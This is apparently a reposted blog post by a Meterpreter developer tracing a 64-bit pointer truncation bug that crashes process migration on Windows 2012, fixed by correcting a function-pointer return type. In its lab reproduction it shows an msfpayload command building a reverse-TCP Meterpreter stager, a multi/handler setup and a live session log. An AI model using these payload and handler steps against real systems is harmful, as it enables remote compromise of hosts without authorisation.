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64bit Pointer Truncation in Meterpreter

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64bit Pointer Truncation in Meterpreter

If you haven’t ever heard of Meterpreter before, you might want to go and take a look at it before reading this post to help give some context. In short, Meterpreter is an amazing library that is part of the Metasploit Framework and can be used to give you tremendous power and control over target machines during a penetration test. Anyone and everyone in the security game is most likely familiar with both Metasploit and Meterpreter, at the very least, if not closely intimate with them. The toolset is fantastic, and is open source!

I’m currently in the very fortunate position of working with the crew from Rapid7 to help improve Meterpreter, particularly on the Windows (both 32 and 64 bit). I have a good list of things to work through while I’m on board including making it easier to build for potential contributors, and to fix some outstanding issues that the R7 crew haven’t had the bandwidth to fix. These people are super-smart, and super-nice and I’m honoured that I’ve been selected to work alongside them.

The purpose of this post is to document the process and resolution of a bug that I have helped resolve since joining. I also aim to lift the lid on Meterpreter a little and help expose how some bits of it work. I hope you enjoy.

Meterpreter Basics

When exploiting a vulnerability during a penetration test using Metasploit, you have a number of payloads that you choose to use which give you some sort of control over your target. Of those payloads, Metepreter is not only the most common, but is probably the most powerful.

Once you have an instance of Metepreter running on a target, you’ve got quite a lot of control. You can escalate privileges, dump password hashes, launch processes, upload files, and you can even use it as a pivot-point for launching attacks against other non-routable hosts. While the power of all this is enough to bake anyone’s noodle, the thing that blows my mind the most is Meterpreter’s ability to migrate to other processes. That is, Meterpreter can dynamically load itself into another processes and then reconnect to your Metasploit session seamlessly without any effort from the attacker (ie. you). Simply executing migrate <process id> at the Meterpreter prompt is all it takes.

There are some caveats when it comes to migration. In particular, you need to have permission to write to the target process’s memory otherwise the migration will not succeed.

Meterpreter comes in quite a few flavours, including PHP, Python, and native/C for Linux and Windows. Some implementations are more feature-rich than others, but they all have common functionality which makes it easy to perform a variety of functions on a compromised host.

We’ll be focusing on the Windows native payload in this post, and in particular we’ll be looking at how Meterpreter is loaded and executed.

Reflective DLL Injection

Simply put, Reflective DLL Injection is a method for injection a DLL into a process. No surprises there. However, it has some nifty properties that make a great candidate for use in tools such as Meterpreter. Some of those points include:

  • Position-independence.
  • Lack of host system registration.
  • Largely undetectable on the target at both a system and process level.

The canonical paper [PDF], written by Stephen Fewer, is well worth reading and can be found on the Harmony Security website. Read it. It’s amazing, and does a much better job of explaining itself than I could ever hope to. I would like to point out that there’s a multi-stage process involved which includes:

  • Writing the code to an executable area of memory.
  • Executing the loader which creates a valid DLL image in memory.
  • Calling DllMain on the loaded DLL.
  • Returning control to the process that invoked it.

With that in mind, let’s take a look at the bug.

The Bug

The bug that was reported related to process migration, and went something like this (paraphrased slightly with a bit more information):

Trying to migrate Metepreter between processes on Windows 2012 seems to be unreliable. It will migrate just fine into some processes, such as
, without any problems. However, spawning another process, such as
, and migrating to it hangs the entire session. Migrating to the
process crashes the entire user environment on the target host.

When I first read this report I thought “Wow, how am I going to track this down?”, and I’ll admit that I was a little intimidated at first, especially given that I knew that the native Windows Meterpreter was using Reflective DLL Injection to load itself into other processes. However, it’s been a long time since I’d been tasked with something this challenging and so, deep down, I was looking forward to diving in.


The first step was to fire up a Windows 2012 virtual machine and replicate the problem. Windows 2012 only comes in a 64-bit flavour, so picking the right version wasn’t a problem.

After installation, I needed to simulate an attack coming from Metasploit so that I could interact with Meterpreter to perform the migration.

Creating a payload to do this is really simple thanks to msfpayload (part of Metasploit). On my Backtrack VM I used the following command to generate the PE image:

root@bt:~# msfpayload windows/x64/meterpreter/reverse_tcp LHOST= LPORT=443 X > 40-443-x64.exe This command creates a 64-bit Windows executable that contains a small stager. This stager connects to (my Backtrack VM) on port 443 (I always choose the HTTPS port to avoid potential outbound firewall issues). Once connected it will download the Meterpreter payload and establish a session with Metasploit.

I copied this binary to the Windows 2012 machine ready to execute. At this point, Metasploit needs to be set up and configured to deal with the incoming request. On the Backtrack VM, we run msfconsole and set it up to use multi/handler with the appropriate settings, like so:

msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 443 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

With those settings in place, the exploit was ready to fire:

msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler...

From the Windows 2012 VM I ran the exploit binary and my Metepreter session kicked off:

[*] Sending stage (951296 bytes) to
[*] Meterpreter session 1 opened ( -> at 2013-09-11 21:55:52 +1000

meterpreter > getuid
Server username: WIN-URCAUVPE291\OJ Reeves
meterpreter > sysinfo
Computer : WIN-URCAUVPE291
OS : Windows 2012 (Build 9200).
Architecture : x64
System Language : en_US
Meterpreter : x64/win64
meterpreter >

Before trying the failure case, I wanted to make sure that the known success case worked locally first. I decided to migrate to explorer.exe and see if anything changed:

meterpreter > ps

Process List

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System 4294967295
444 4 smss.exe 4294967295
484 708 svchost.exe 4294967295
536 524 csrss.exe 4294967295
604 596 csrss.exe 4294967295
612 524 wininit.exe 4294967295
640 596 winlogon.exe 4294967295
692 720 explorer.exe x86_64 1 WIN-URCAUVPE291\OJ Reeves C:\Windows\Explorer.EXE
708 612 services.exe 4294967295
716 612 lsass.exe 4294967295
804 708 svchost.exe 4294967295
816 708 svchost.exe 4294967295

... snip ...

meterpreter > migrate 692
[*] Migrating from 1508 to 692...
[*] Migration completed successfully.
meterpreter > getuid
Server username: WIN-URCAUVPE291\OJ Reeves
meterpreter > sysinfo
Computer : WIN-URCAUVPE291
OS : Windows 2012 (Build 9200).
Architecture : x64
System Language : en_US
Meterpreter : x64/win64
meterpreter >

Migration seemed to work. Next I tried the failure case. First I launched notepad.exe and then attempted to migrate to it:

meterpreter > execute -f notepad.exe -t -H
Process 192 created.
meterpreter > migrate 192
[*] Migrating from 692 to 192...
[-] Error running command migrate: Rex::RuntimeError No response was received to the core_loadlib request.
meterpreter >

The session hung at this point and no Meterpreter commands would work. When I went over to the Windows 2012 VM I saw that there was a notification that the notepad.exe process had crashed. This was great as I was able to reproduce the failure. It was time to investigate the problem.


To help figure out what was going wrong, I enlisted the help of two of my favourite tools: DebugView and Windbg. Coverage of these tools is beyond the scope of the article, so if you want to learn more about them you’ll find a stack of information out on the web. Given that this machine was 64-bit and the process we were aiming to debug was 64-bit, I installed the 64-bit version of the Debugging Tools for Windows so that the right version of windbg was available.

Before dabbling with any of the binaries and adding debug detail, I repeated the failure scenario but with one small change: I launched notepad.exe manually and attached to it from windbg prior to performing the migration. I left DebugView running as well to catch any debug messages from processes outside of the one that windbg was attached to.

Upon running the migrate command notepad.exe crashed and windbg caught the exception. This is what it showed:

(ab0.448): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00000000`707a7b5c ?? ???

We can see that we’re accessing memory that we shouldn’t be accessing. But why?

0:003> !analyze -v
* *
* Exception Analysis *
* *

00000000`707a7b5c ?? ???

EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00000000707a7b5c
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000008
Parameter[1]: 00000000707a7b5c
Attempt to execute non-executable address 00000000707a7b5c

... snip ...

The migration process results in an attempt to execute a section of code in an area of memory that isn’t marked as executable. Let’s confirm that:

0:003> !vprot 00000000707a7b5c
BaseAddress: 00000000707a7000
AllocationBase: 0000000000000000
RegionSize: 000000000f839000
State: 00010000 MEM_FREE
Protect: 00000001 PAGE_NOACCESS

As we can see the memory area is definitely not marked as executable. But should it be? Should this memory be executable, or are we just pointing to an invalid area of memory? If it was the former, then it might imply that DEP or ASLR are somehow interfering. However, my gut feeling was that it was the latter. A quick look at the contents of the memory at this location would be enough to confirm:

0:003> du 00000000707a7b5c
00000000`707a7b5c "????????????????????????????????"
00000000`707a7b9c "????????????????????????????????"
00000000`707a7bdc "????????????????????????????????"
00000000`707a7c1c "????????????????????????????????"
00000000`707a7c5c "????????????????????????????????"
00000000`707a7c9c "????????????????????????????????"
00000000`707a7cdc "????????????????????????????????"
00000000`707a7d1c "????????????????????????????????"
00000000`707a7d5c "????????????????????????????????"
00000000`707a7d9c "????????????????????????????????"
00000000`707a7ddc "????????????????????????????????"
00000000`707a7e1c "????????????????????????????????"

It’s pretty clear that no valid code is located in this area of memory. This implied that there was a possibility that a pointer to an area of code is somehow going awry. But where? To find this out, I needed to add some more debug output to Meterpreter.

Next, I opened the Meterpreter source in Visual Studio 2012 (freshly moved from VS 2010 by yours truly) and prepared to rebuild the binaries with some extra debug output. I littered the code with OutputDebugString calls at various key locations, enabled the existing logging that was built into the source, and rebuilt the suite of binaries from scratch. Once built, I deployed them to my Backtrack VM, fired up DebugView on the Windows 2012 VM and repeated the process (including attaching to notepad.exe with windbg). Here’s a snippet of the output:

[SERVER] Initializing...
[SERVER] module loaded at 0x350B0000
[SERVER] main server thread: handle=0x00000138 id=0x000008F0 sigterm=0x334D7B20
[SERVER] Using SSL transport...
[SERVER] Initializing tokens...
[SERVER] Flushing the socket handle...
[SERVER] Initializing SSL...
[SERVER] Negotiating SSL...
ModLoad: 000007ff`58060000 000007ff`58075000 C:\Windows\system32\NETAPI32.DLL
ModLoad: 000007ff`586d0000 000007ff`586de000 C:\Windows\system32\netutils.dll
ModLoad: 000007ff`5b020000 000007ff`5b044000 C:\Windows\system32\srvcli.dll
ModLoad: 000007ff`58020000 000007ff`58035000 C:\Windows\system32\wkscli.dll
ModLoad: 000007ff`5ad10000 000007ff`5ad2a000 C:\Windows\system32\CRYPTSP.dll
ModLoad: 000007ff`5a990000 000007ff`5a9d9000 C:\Windows\system32\rsaenh.dll
[SERVER] Sending a HTTP GET request to the remote side...
[SERVER] Completed writing the HTTP GET request: 27
[SERVER] Registering dispatch routines...
Registering a new command (core_loadlib)...
Allocated memory...
Setting new command...
Fixing next/prev...
[SERVER] Entering the main server dispatch loop for transport 0...
[DISPATCH] entering server_dispatch( 0x334D7B60 )
[SCHEDULER] entering scheduler_initialize.
[SCHEDULER] leaving scheduler_initialize.
[DISPATCH] created command_process_thread 0x33523030, handle=0x000001F0
[COMMAND] Processing method core_loadlib
[COMMAND] core_loadlib: Entry
[COMMAND] core_loadlib: libraryPath (ext264209.x64.dll) flags (2)
[COMMAND] core_loadlib: lib does not exist locally (being uploaded)
[COMMAND] core_loadlib: lib is not to be stored on disk
[LOADLIBRARYR] GetReflectiveLoaderOffset
[LOADLIBRARYR] GetReflectiveLoaderOffset (5488)
[LOADLIBRARYR] Calling VirtualProtect lpBuffer (0000008935318B20) length (428544)
[LOADLIBRARYR] Calling pReflectiveLoader (000000893531A090)
ModLoad: 000007ff`555e0000 000007ff`55600000 C:\Windows\system32\WINMM.dll
ModLoad: 000007ff`555a0000 000007ff`555d2000 C:\Windows\system32\WINMMBASE.dll
ModLoad: 000007ff`57e00000 000007ff`57e2c000 C:\Windows\system32\IPHLPAPI.DLL
ModLoad: 000007ff`57de0000 000007ff`57dea000 C:\Windows\system32\WINNSI.DLL
[LOADLIBRARYR] Calling pDllMain (0000000033449BEC)
(9b8.968): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00000000`33449bec ?? ???

The extra debug calls that I added to the source are those marked with [LOADLIBRARYR]. These calls were located in the guts of the reflective DLL injection code.

As we already know from earlier in this post, the reflective DLL injection code dynamically builds a valid DLL image in memory and then invokes it. The method which builds this DLL image is called ReflectiveLoader() and is invoked in code via a pointer called pReflectiveLoader, which you can see in the above output. At the end of the ReflectiveLoader() function, a reference to DllMain() is resolved and invoked directly prior to returning control to the caller.

Once this function returns, the Meterpreter-specific code then calls DllMain() again, using the value returned from ReflectiveLoader(), to invoke some functionality required by the Metasploit framework. In the above output, you can see the pointer to DllMain() called pDllMain, and this is the pointer that’s used to make the call.

What was interesting about the log is that the first call to DllMain() that is invoked in the body of ReflectiveLoader() worked fine, otherwise the process would have crashed prior to the line that outputs the value of the pDllMain variable. Instead, it was the second call to DllMain() via the pDllMain pointer that caused the crash. This implied that the memory address that was being returned from ReflectiveLoader() was incorrect.

The nature of the reflective loading mechanism implied to me that the addresses of pReflectiveLoader and pDllMain should actually be quite close together in memory. However, focussing on a small part of the output, I noticed the following:

[LOADLIBRARYR] Calling pReflectiveLoader (000000893531A090)
[LOADLIBRARYR] Calling pDllMain (0000000033449BEC)

Those two pointers were nowhere near each other! The more perceptive of you will have noticed that the pDllMain pointer appeared to have lost its higher-order DWORD. The pointer had in fact been truncated!

But why? It wasn’t immediately obvious to me what the reason was, but I was keen to validate that this was the case. To prove my theory, I hacked the code a little so that the higher-order DWORD of the pReflectiveLoader value was used as the higher-order DWORD of pDllMain as well. The hack looked something like this:

ULONG_PTR ulReflectiveLoaderBase = ((ULONG_PTR)pReflectiveLoader) & (((ULONG_PTR)-1) ^ (0xFFFFFFFF));
pDllMain = (DLLMAIN)(pReflectiveLoader() | ulReflectiveLoaderBase);

After the above code, pDllMain would have the same higher-order DWORD value as pReflectiveLoader. I compiled, deployed, executed …

… and it worked!


Armed with the knowledge earned from the above diagnosis, I set about looking through the code to see why this pointer was being truncated. Clearly the value was perfectly fine prior to being returned from ReflectiveLoader(), so why was it truncated upon return?

I spent quite a bit of time looking around, and I didn’t find anything. Nothing was leaping out at me. I felt really stupid. So instead of beating about the bush, I contacted the man himself, the author and creator of Reflective DLL Injection himself, Mr Stephen Fewer. I explained the situation to him, detailed my findings and asked if he any idea as to why this problem might be occurring.

It didn’t take long to get a response. Stephen jumped on the issue straight away, fixed it and submitted a pull request to the Meterpreter repository before emailing me back with details of the solution. Talk about great service!

When I saw the solution I immediately felt stupid for missing it myself. In hindsight I should have known to look in this location. I ate some humble pie and savoured the taste while expressing my gratitude to Stephen for his prompt response.

So what was it?

The pReflectiveLoader pointer is a function pointer of a type defined like so:


However, the ReflectiveLoader() function was defined in the source like so:

DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
// ... snip ...

So the function returns a ULONG_PTR (which is 64-bits) but the function pointer type returned a DWORD (which is 32-bits). This is what was causing the truncation of the pointer and effectively zeroing out the higher-order DWORD of pDllMain. The fix was to simply change the return type of the function pointer to match:


Problem solved.

Extra Thoughts and Conclusion

For those of you who are wondering, like I was, why this was an intermittent problem the answer lies in the fact that the new versions of Windows have newer versions of ASLR. To quote Stephen:

The bug was triggering on Server 2012 but not other 64bit systems probably due to high entropy ASLR making allocations over the 4gig boundary.

Earlier versions of Windows didn’t have an ASLR implementation that resulted in memory allocations over the 4GB boundary. As a result, the higher-order DWORD was always zero anyway, which meant that the truncation had no impact.

This was a really fun bug to analyse and track down. I’m glad we got to the bottom of it. Again I’d like to thank Stephen for his involvement in locating the source of the problem.

The new and improved version of Meterpreter that contains this fix will be landing in Metasploit very soon (I hope). Thanks for reading. Comments and feedback are welcomed.

Sursa: 64bit Pointer Truncation in Meterpreter - OJ's perspective

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